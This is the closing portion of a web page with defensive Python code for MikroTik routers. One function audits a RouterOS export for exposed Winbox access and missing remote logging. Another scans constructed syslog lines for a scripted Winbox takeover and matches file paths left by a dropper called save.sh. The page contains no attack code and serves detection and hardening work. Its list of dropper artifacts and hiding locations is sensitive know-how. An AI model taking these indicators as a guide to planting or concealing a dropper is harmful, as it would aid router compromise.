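        sections[section].append(entry)
    return sections


def audit_winbox_exposure(export_text):
    """Return (code, explanation) findings; an empty list means every check passed."""
    cfg = parse_export(export_text)
    findings = []

    winbox = [e for e in cfg["/ip service"] if e.get("_target") == "winbox"]
    if not (winbox and winbox[0].get("address")):
        findings.append(("winbox-unrestricted", "/ip service winbox has no address= restriction"))

    rules = cfg["/ip firewall filter"]

    def targets_winbox(rule):
        return (rule.get("chain") == "input" and rule.get("protocol") == "tcp"
                and WINBOX_PORT in rule.get("dst-port", "").split(","))

    # Accept only from a named list; a bare accept for everyone does not count.
    allow = [i for i, r in enumerate(rules) if targets_winbox(r)
             and r.get("action") == "accept" and r.get("src-address-list")]
    # A Winbox-specific drop, or a catch-all input drop with no port selector.
    deny = [i for i, r in enumerate(rules) if r.get("chain") == "input"
            and r.get("action") in ("drop", "reject") and (targets_winbox(r) or "dst-port" not in r)]
    if not allow:
        findings.append(("winbox-no-allowlist-rule", "no input rule accepts tcp/8291 from an address list"))
    if not deny or (allow and min(allow) > min(deny)):
        findings.append(("winbox-not-dropped", "tcp/8291 is not dropped on input after the allow rule"))

    remote = {a.get("name") or a.get("_target") for a in cfg["/system logging action"]
              if a.get("target") == "remote"}
    if not any(rule.get("action") in remote for rule in cfg["/system logging"]):
        findings.append(("no-remote-syslog", "nothing is logged to a remote target; the local buffer wraps"))
    return findings
```

<P>Run it as <EM>audit_winbox_exposure(open("router.rsc").read())</EM> over a real <EM>/export</EM>; the weak sample yields all four findings and the hardened one none. The parser deliberately treats a missing <EM>set winbox</EM> line as unrestricted, because an export only lists values that differ from the defaults, and the default for <EM>address</EM> is empty.</P>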
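<P>The indicators this thread describes (a failed Winbox login, then a successful one from the same address, and an “ip services changed by …” entry carrying the same timestamp as that login, plus the <EM>dnstest</EM>/<EM>save.sh</EM> files from the update) are only usable if they have been shipped off the router before the log buffer wraps. The detector below is an added example written for this page, not code from the thread or from MikroTik. It runs over constructed syslog lines; the “ip services changed by” wording is taken from the thread, the “login failure for user … via winbox” and “user … logged in from … via winbox” wording and the collector line format are assumed, and the file list is derived from the posted <EM>save.sh</EM>.</P>

```python
"""Detect the Winbox takeover pattern described in this thread in RouterOS syslog.

Added example, not code from the thread or from MikroTik. Flags a Winbox login that
follows a failed login from the same address and has an "ip services changed by ..."
entry at the same timestamp, and lists files the posted save.sh leaves behind.
Log lines and paths below are constructed samples.
"""
import re
from datetime import datetime, timedelta
from posixpath import basename, dirname

# Line as written by a syslog collector fed from a RouterOS remote logging action:
# "<Mon> <day> <hh:mm:ss> <host> <topics> <message>" (format assumed for the example).
LINE_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (\S+) (\S+) (.*)$")
# Message wording: "ip services changed by" is quoted in the thread; the two login
# messages follow RouterOS's account log entries (assumed here).
EVENT_RES = {
    "fail": (re.compile(r"login failure for user (\S+) from (\S+) via (\S+)"), ("user", "src", "via")),
    "login": (re.compile(r"user (\S+) logged in from (\S+) via (\S+)"), ("user", "src", "via")),
    "change": (re.compile(r"ip services changed by (\S+)"), ("user",)),
}


def parse_event(line, year=2018):
    """Return an event dict for the three kinds above, None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    stamp, host, _topics, message = m.groups()
    for kind, (rx, names) in EVENT_RES.items():
        em = rx.search(message)
        if em:
            ev = {"kind": kind, "host": host,
                  "ts": datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")}
            ev.update(zip(names, em.groups()))
            return ev
    return None


def detect_winbox_takeover(lines, window=timedelta(minutes=10), skew=timedelta(seconds=1)):
    """One alert per Winbox login that (a) follows a failed Winbox login from the
    same source within `window` and (b) has an ip-services change by that user
    within `skew` of the login: a human does not change it in the same second."""
    events = [e for e in map(parse_event, lines) if e]
    alerts = []
    for i, login in enumerate(events):
        if login["kind"] != "login" or login["via"] != "winbox":
            continue
        primed = any(e["kind"] == "fail" and e["via"] == "winbox" and e["src"] == login["src"]
                     and timedelta(0) <= login["ts"] - e["ts"] <= window for e in events[:i])
        scripted = any(e["kind"] == "change" and e["user"] == login["user"]
                       and abs(e["ts"] - login["ts"]) <= skew for e in events)
        if primed and scripted:
            alerts.append({"host": login["host"], "src": login["src"],
                           "user": login["user"], "at": login["ts"].isoformat()})
    return alerts


# Names the posted save.sh writes or removes, and the directories it uses; "" covers
# a bare name as shown in Winbox's Files list.
DROPPER_FILES = {"save.sh", "dnstest", ".dnstest", ".test", "echo"}
DROPPER_DIRS = {"", "/flash/rw/pckg", "/flash/bin", "/usr/local/bin"}


def dropper_artifacts(paths):
    """Paths whose name and location match what the dropper leaves behind."""
    return sorted(p for p in paths if basename(p) in DROPPER_FILES and dirname(p) in DROPPER_DIRS)


# Constructed sample: one scripted takeover, one noisy ssh failure, one legitimate admin.
SAMPLE_LOG = """\
Apr 24 06:45:58 ccr1036 system,error,critical login failure for user admin from 203.0.113.5 via winbox
Apr 24 06:46:01 ccr1036 system,info,account user admin logged in from 203.0.113.5 via winbox
Apr 24 06:46:01 ccr1036 system,info ip services changed by admin
Apr 24 06:46:03 ccr1036 system,info,account user admin logged out from 203.0.113.5 via winbox
Apr 24 08:02:11 ccr1036 system,error,critical login failure for user admin from 198.51.100.7 via ssh
Apr 24 09:12:40 ccr1036 system,info,account user noc logged in from 192.168.88.10 via winbox
Apr 24 09:15:02 ccr1036 system,info ip services changed by noc
""".splitlines()
SAMPLE_FILES = ["skins/default.json", "save.sh", "/flash/rw/pckg/dnstest", "/bin/echo", "/flash/bin/echo"]

if __name__ == "__main__":
    print(detect_winbox_takeover(SAMPLE_LOG))
    print(dropper_artifacts(SAMPLE_FILES))
```

<P>The second operator in the sample (<EM>noc</EM>) also changes ip services after a Winbox login, but minutes later and without a preceding failure, so it is not flagged; only the login from 203.0.113.5 is. The legitimate <EM>/bin/echo</EM> is likewise not reported, because the dropper's replacement <EM>echo</EM> lives under <EM>/flash/bin</EM> or <EM>/usr/local/bin</EM>, where it gets picked up through the PATH the script extends.</P>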
</DIV></DIV></DIV></BODY></HTML>